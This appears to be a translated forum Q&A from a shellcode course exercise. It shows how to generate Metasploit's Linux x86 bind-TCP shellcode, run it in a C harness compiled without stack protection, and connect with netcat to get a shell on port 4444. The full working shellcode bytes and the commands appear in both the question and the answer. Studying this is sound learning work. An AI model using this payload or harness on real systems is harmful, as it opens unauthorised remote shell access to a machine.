1

我在沙盒 c 程序中运行 Metasploit 有效负载。

以下是感兴趣的有效载荷的摘要。从那里我生成一些 shellcode 并将其加载到我的沙箱中,但是当我运行它时,程序只会等待。我认为这是因为它正在等待连接发送外壳,但我不确定。

我将如何去:

  1. 生成shellcode
  2. 将其加载到我的沙箱中
  3. 成功获得一个/bin/sh外壳<-这是我坚持的部分。

基本设置:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
[sudo] password for max: 

       Name: Linux Command Shell, Bind TCP Inline
     Module: payload/linux/x86/shell_bind_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 200
       Rank: Normal

Provided by:
  Ramon de C Valle <rcvalle@metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LPORT  4444             yes       The listen port
RHOST                   no        The target address

Description:
  Listen for a connection and spawn a command shell

生成shellcode:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C

带有 shellcode 的沙盒程序:

#include<stdio.h>
#include<string.h>
/*
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 */

unsigned char code[] = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

  int (*ret)() = (int(*)())code;

  ret();

}

编译并运行。但是,这是我不确定如何获得/bin/sh外壳的地方:

max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20
(program waiting here...waiting for a connection?)

编辑:

在终端一中,我运行我的 shellcode 程序:

max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

现在在二号航站楼,我检查 tcp 侦听器。给予-n抑制主机名解析,-t用于 tcp,-l用于侦听器,并-p查看程序名称。

我可以在 4444 端口看到 shellcode 程序:

max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address       State     PID/Program name      
tcp      0    0     0.0.0.0:4444      0.0.0.0:*             LISTEN    14885/shellcode       
max@ubuntu-vm:~$

与 连接telnet,似乎成功但仍然没有sh外壳。

max@ubuntu-vm:~$ telnet 0.0.0.0 4444
Trying 0.0.0.0...
Connected to 0.0.0.0.
Escape character is '^]'.

如何获得sh贝壳?

4

1 回答 1

0

生成shellcode,编译运行:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false, 
 * PrependSetresuid=false, PrependSetreuid=false, 
 * PrependSetuid=false, PrependSetresgid=false, 
 * PrependSetregid=false, PrependSetgid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

现在,在终端 2。检查连接,最后使用netcat. 请注意,$没有出现,但外壳仍然存在:

max@ubuntu-vm:~$ sudo netstat -ntlp 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode    
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max    591 Jan  2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max    591 Jan  2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max    471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max    471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max    442 Jan  2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max    442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max    139 Dec 27 08:18 compile.sh
于 2014-01-04T17:52:17.223 回答